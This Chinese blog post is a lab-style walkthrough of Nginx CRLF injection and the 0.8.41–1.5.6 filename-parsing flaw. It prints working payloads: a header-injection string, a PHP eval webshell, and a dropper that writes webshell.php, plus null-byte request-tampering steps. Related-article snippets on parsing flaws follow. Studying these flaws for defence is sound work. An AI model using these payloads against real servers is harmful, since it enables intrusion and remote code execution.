Nginx相关漏洞解析

已于 2025-03-25 11:05:09 修改
阅读量548 收藏 3
点赞数 5
文章标签: 安全 web安全
于 2025-03-25 11:04:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146495793
版权

一、CRLF注入漏洞

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞

1、开环境

2、访问网站,并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马,抓包

4、修改数据包

在文件名的最后加个空格,就可以把木马上传进去

5、放行,访问木马

这里看到木马已经上传进去了

(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包

(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e

(3)放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg,抓包,加空格,放行

访问刚刚上传的文件,这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包,修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功,测试连接

phpstudy nginx解析漏洞分析
惠惠软件
06-30 881
可见 这里的正则处理,将文件传递给fastcgi处理,$fastcgi_script_name会被设置为1.png/.php,然后构造成SCRIPT_FILENAME传递给PHP CGI。如果PHP中开启了fix_pathinfo这个选项,PHP会认为SCRIPT_FILENAME是1.png,而.php是PATH_INFO,所以就会将1.jpg作为PHP文件来解析了。这是我的生产环境,根据漏洞特性,大概率就是fastcgi的问题。查看该站点相关nginx的配置文件。成功执行phpinfo();
中间件漏洞(二)nginx解析漏洞
m0_63306943的博客
05-03 1046
会向上匹配,能匹配到nginx.png文件,又因为php-fpm.conf中的security.limit_extensions为空,也就是说任意后缀名都可以解析为PHP文件,所以就将nginx.png当作php文件进行了解析生成上面的结果。例:你的nginx下存在一个test.jpg文件,你在查找执行php文件时 /test.jpg/test.php查找时发现没有test.php就会向上匹配到test.jpg文件。这里我们利用到之前上传的一个包含php代码的文件nginx.png。
nginx常见漏洞解析
热门推荐
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用 怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
Nginx漏洞利用与安全加固
weixin_33973600的博客
04-09 367
本文主要分为两大部分,第一部分介绍了Nginx的一些常见安全漏洞的形成原因、利用方法,并给出了相应的解决办法;第二部分介绍了Nginx安全加固时需要关注的主要内容。Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows...
中间件安全Nginx常见漏洞
剁椒鱼头没剁椒的博客
02-21 5203
在上篇中间件安全—Apache常见漏洞中,并未对中间件漏洞进行解释,这里补充一下。
nginx解析漏洞利用
huzenhuzen的专栏
05-01 1505
nginx解析漏洞利用 那么假设存在一个http://www.target.com/jpg.jpg,我们以如下的方式去访问 http://www.target.com/jpg.jpg/php.php 将会得到一个URI /jpg.jpg/php.php 经过location指令,该请求将会交给后端的fastcgi处理,nginx为其设置环境变量SCRIPT_FILENAME,内容为
Nginx相关漏洞极其预防1
08-08
Nginx 相关漏洞极其预防 ...Nginx 相关漏洞的预防需要我们从多方面入手,包括文件解析漏洞、目录遍历漏洞、CRLF 注入漏洞和目录穿越漏洞等。只有通过正确的配置和预防措施,我们才能确保 Nginx 服务器的安全
下列哪个是nginx解析漏洞解析为php的文件_phpStudy nginx解析漏洞预警通报
weixin_39613951的博客
11-23 645
大网安协【2020-59】近日,大连网络安全信息通报机制合作单位新华三集团(H3C)提醒,一个PHP调试环境的程序集成包phpStudy,Windows 版本存在nginx解析漏洞。1.漏洞综述1.1漏洞背景phpStudy是一个PHP调试环境的程序集成包,兼容Windows和Linux系统,支持Web端管理,可以一键创建网站、FTP、数据库等,实现了文件管理,PHP多版本共存及切...
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1734
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
常见框架漏洞nginx
最新发布
l2772513700的博客
03-25 462
在页面抓包,在get/后面加上 %0Aset-cookie:jspsessid%3D3 发送。Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头。这一漏洞的原理是非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,也可以上传木马,不过因为jpg...php访问不到木马,所以我们让木马文件生成一个木马。开启环境,访问页面,上传jpg文件。同理,进行操作,访问生成的木马即可。抓包,在文件名后面加上空格。上传成功后,浏览器访问。
nginx漏洞复现(包含nginx的介绍,配置,访问控制等内容),是较全的nginx学习
2401_83739777的博客
04-18 810
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上运维知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂
Nginx 解析漏洞
黑白的博客
12-20 347
声明 好好学习,天天向上 漏洞描述 由于nginx.conf的配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。 但是fastcgi在处理’.php’文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用
Nginx常见的中间件漏洞
qq_68163788的博客
11-25 2285
Nginx在收到/test.jpg/test.php路径时,首先判断文件类型,发现后缀是.php,便交给php处理,但php想要解析该文件时,发现并不存在,便删除掉/test.php,去找test.jpg,此时test.jpg是存在的,便要尝试解析它,但无奈后缀是.jpg,不是php,便报错Access denied。例如网站的首页的缓存,nginx的默认缓存路径在/tmp/nginx下,例如:当请求服务器的资源时,如果在缓存服务器中存在,则直接返回,不在访问应用服务器,可以降低应用服务器的负载。
nginx常见漏洞解析_nginx漏洞(1),程序员如何技术划水
2401_84181340的博客
04-10 832
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 8128
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
深入浅出带你学习Nginx中间件常见漏洞
小王的技术库
02-16 731
本文总结了一下中间件nginx在中间件常见的漏洞,当然只是一小部分,总结一下NGINX主要还是围绕解析漏洞来展开,对于NGINX存在的漏洞我们也可以带入到别的中间件去分析,如果喜欢本文,希望可以一键三连支持一下。最近还整理一份JavaScript与ES的笔记,一共25个重要的知识点,对每个知识点都进行了讲解和分析。能帮你快速掌握JavaScript与ES的相关知识,提升工作效率。
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器的安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感文件,或者通过服务器作为跳板攻击其他系统。 这种漏洞的影响范围非常广泛,可能会影响到运行 Nginx 服务器的任何组织。攻击者可以利用这种漏洞来窃取敏感数据、破坏系统或进行其他恶意活动,这可能会导致严重的安全问题和数据泄露。 因此,及时修补 Nginx 中间件解析漏洞至关重要。同时,建议您采取其他安全措施,例如启用防火墙、使用安全认证机制、限制对服务器的访问等,以最大程度地减少遭受攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值